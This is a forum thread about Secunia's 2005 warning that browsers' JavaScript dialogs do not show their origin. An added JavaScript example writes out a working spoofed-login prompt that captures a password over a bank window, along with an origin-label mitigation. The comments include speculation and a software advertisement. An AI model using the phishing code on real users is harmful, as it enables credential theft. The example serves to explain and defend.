Major Browsers Have JS Pop-Up Flaw
An anonymous reader writes "Secunia is warning that several popular browsers contain a vulnerability that could allow a phishing attack. 'The problem is that JavaScript dialog boxes do not display or include their origin, which allows a new window to open -- for example, a prompt dialog box -- which appears to be from a trusted site,' Secunia said. The browsers include the latest versions of IE, IE for Mac, Safari, iCab, Mozilla, Mozilla Firefox and Camino. Opera 7 and 8 are also affected but not 8.01."
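The Secunia description above is compact, so here is the flow it describes written out as code. This is an added example, not Secunia's test page and not code from any browser vendor or poster in this thread. The hostnames (attacker.example, bank.example), the "session expired" wording, the zero delay and the window double used to run it outside a browser are all made up for illustration; the attack function itself uses only window.open, setTimeout and prompt.

```javascript
// Added example, not from the Secunia advisory or the Slashdot thread.
// The flaw in one function: the dialog is raised by the ATTACKER's document,
// but the user is looking at the TRUSTED site's window, and nothing in the
// dialog says which document produced it.
function spoofedLoginPrompt(win, trustedUrl, delayMs, onCapture) {
  // 1. Open the genuine trusted site in a second window so the user sees its real UI.
  const trusted = win.open(trustedUrl, 'trusted_window');
  const host = new URL(trustedUrl).hostname;
  // 2. Once the trusted page is in front, raise a prompt from THIS (attacker) window.
  //    With no origin in the dialog, the user attributes it to the window they see.
  win.setTimeout(() => {
    const secret = win.prompt(`Your ${host} session has expired.\nPlease re-enter your password:`);
    if (secret !== null) onCapture(secret); // a real attacker would post this to their server
  }, delayMs);
  return trusted;
}

// Browser-side mitigation: label every dialog with the origin of the script that
// raised it. A page cannot protect itself this way, because the attacker's page
// decides whether to call the wrapper; the browser has to do it. The wrapper is
// applied to a window-like object here so the same code runs in Node.
function labelWithOrigin(origin, message) {
  return `${origin} says:\n\n${message}`;
}

function installOriginLabeledDialogs(win) {
  const origin = win.location.origin;
  for (const name of ['alert', 'confirm', 'prompt']) {
    const original = win[name].bind(win);
    win[name] = (message, ...rest) => original(labelWithOrigin(origin, String(message)), ...rest);
  }
  return win;
}

// Minimal window double (constructed for this example) so the flow can run outside
// a browser: prompt() records what the user would have seen and "types" a password.
function makeFakeWindow(origin) {
  const seen = [];
  return {
    seen,
    location: { origin },
    open: (url) => ({ url }),
    setTimeout: (fn) => fn(), // run the delayed step synchronously for the demo
    prompt: (msg) => { seen.push(msg); return 'hunter2'; },
    alert: (msg) => { seen.push(msg); },
    confirm: (msg) => { seen.push(msg); return true; },
  };
}

// Run the attack against an unpatched and a "patched" window and report what the
// user saw and what the attacker got.
function runDemo(withMitigation) {
  const win = makeFakeWindow('https://attacker.example');
  if (withMitigation) installOriginLabeledDialogs(win);
  let captured = null;
  spoofedLoginPrompt(win, 'https://bank.example/login', 0, (s) => { captured = s; });
  return { dialogText: win.seen[0], captured };
}

if (typeof window !== 'undefined' && typeof document !== 'undefined') {
  // In a real browser: opens the trusted site, then raises the unlabeled prompt.
  spoofedLoginPrompt(window, 'https://bank.example/login', 1500, (s) => console.log('captured', s));
} else {
  console.log(runDemo(false).dialogText);
  console.log(runDemo(true).dialogText);
}
```

The unpatched run shows a dialog that mentions only bank.example; the labeled run prefixes it with "https://attacker.example says:", which is the visible cue Opera 8.01 is credited with above. Tying the dialog to its own window, as the Firefox-on-Mac sheet behaviour described further down does, is the other way to give the user the same information.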
Opera 8.01 was released June 18th.... (only a few days ago)
//tin-foil hat engaged
It is the only browser not affected....
And now this leaked out where reports can only say that one browser does not suffer from this issue.
...and they're not going to release a patch for it.
;)
And you *know* that if Microsoft says it's not a flaw, well, then, it mustn't be a flaw.
libertarianswag.com
To solve this problem, JavaScript multitasking must be disabled, only letting the currently active window or tab, the one with keyboard focus, run its JavaScript. Other tabs' scripts must not be disabled, but instead paused until they in turn receive focus.
It cracks me up, because they probably have an obsessive/compulsive, socially-maligned programmer within Secunia who just delights in spending 16 hours a day trying to twist the browsers into doing what he wants. And then Secunia announces these flaws to save their reputation because nothing else is going on.
It's not even a bug.
/., stop supporting Opera FUD. Thanks.
It's advertising and FUD from those Opera guys. They are really getting boring.
- Opera adds a feature that shows the name of the site in the title bar in their last build
- Someone at Opera reports it (under a false name) as a security issue affecting every browser BUT Opera
- Slashdot runs one more article about the genius of this stupid paid-for, closed source browser.
That's not the first time it happens, nor will it be the last.
You really think most people end up on malicious sites intentionally?
People should stop developing with JavaScript. It's nothing but trouble.
Poppycock. This is nothing more than a typical knee-jerk reaction to a minor security flaw. Should we all stop using email because phishers can craft ones that look like someone else's?
Lots of sites use JavaScript very effectively. So many, in fact, that it's rather difficult to make such a wild statement as "JavaScript is nothing but trouble." Google is a perfect example of a highly useful site with JS. For example, Maps and GMail both rely heavily on JS. In fact, most webmail sites contain JS. And without JS, you couldn't have neat stuff like this. (Login is test, test)
Javascript + Nintendo DSi = DSiCade
Have you ever used Objective-C? It's the SLOWEST compiled environment ever! And, because there's no garbage collection, etc., it's certainly no more secure than "raw" C (because all of C is legal in Objective-C). In many cases, Objective-C is slower than Java because of its "run-time" binding.
Best Buy can have you arrested
Actually, this attack doesn't work "well" with Firefox on Mac, which uses sheets to display JavaScript dialogs (alert, prompt, confirm). By tying the dialog to the window, it becomes visually obvious which window the pop-up belongs to.
Now why doesn't Safari use this? Seems strange Apple wouldn't use their own UI convention.
If Secunia is reporting it, why not link directly to Secunia?
http://secunia.com/multiple_browsers_dialog_origin_vulnerability_test
I've never understood the reason to link to ZDnet first. Especially when we are all a technical crowd and can deduce the severity on our own.
In my own opinion, the security community has been really scrambling to find exploits and vulnerabilities since the release of Windows XP SP2, which, despite a lot of compatibility issues with common software, has been very effective in slowing down the growth of zombie networks. In short, Microsoft finally got something right, and those that are in IT security for the sole reason of bashing MS to make a buck, are having a hard time doing so.
This is a phishing technique that can be used to get a username/password from, like, a credit card or bank website, but that's about it. You'd be hard pressed to get this to compromise a local machine, although I'm interested in what would happen if someone tried calling a local zone page (like a help file) and then executing the JavaScript from that page. There was a similar exploit that used this delayed tactic last year that Microsoft didn't fix for probably 3 months. It was a 0-day exploit too; it was found in the wild, spreading via IRC, before anyone reported the vulnerability.
How many of us have it disabled in our browsers?
Only the most paranoid of geeks, buddy. Average Joe has no idea what Javascript is. Hell, I was and currently am a part time web developer, and I'm not afraid of Javascript.
I don't respond to AC's.
b) You can certainly use unsafe C constructs in ObjC, but ObjC provides (and encourages) safe, non-C constructs that address the vast majority of C problems. Unsafe pointer and buffer operations are rare in ObjC, because the language provides better alternatives.
c) "Many cases slower than Java" is the sort of unsupportable bullshit that people make up when they're trolling. Yes, message passing is slower than virtual function calls (and Java's are [much, much] slower than C++'s vcalls).
I want a window manager that draws lines between parent/child windows, parent/child processes. While we're at it, how about one that lets me click one window, then drag all the windows in the group as one, maintaining relative position? Yeah, I want to drag windows around, and save their positions with the window manager, then open that state with a single click on a desktop menu. While we're at it, I want the groups to include arbitrary windows from multiple apps. So I can open a "workplace", and immediately begin working in a familiar environment. If this works, how about letting me drag a line from any window to another, piping STDIN/OUT/ERR between processes? If I can minimize the windows into icons, my window manager is now a visual programming environment. Which, to come full circle, could let me as a user tell by looking which info is tainted by which untrusted windows and datapaths, including innocent-looking JS popup windows.
--
make install -not war
If you have a visual rather than a list as a search engine then it can stop all Java Pop-Up activity. It can stop anything because it scans each page. Try it out. It's on download.com free. http://www.download.com/ViewFour-com-ViewSmart/3000-8022_4-10406154.html?tag=lst-0-18
Here is a description...
ViewSmart by ViewFour.com is Web-based software that visually displays search results found in Google, MSN, eBay, and other search/e-commerce engines in a multi-window environment (2-50). By visually displaying results you get to see your searches rather than having to click back and forth through them. This slick new method of searching the Web also removes the potential dangers of surfing the NET. The software scans each Web page prior to displaying it and stops all hidden and/or malicious files from being automatically downloaded without your knowledge. If a page fails the scan, a large red border and stop sign will appear around the window. This means you are protected from contracting viruses, adware, spyware, and other forms of malware while surfing the Web.
Version 2.94 improves malware scanning engine.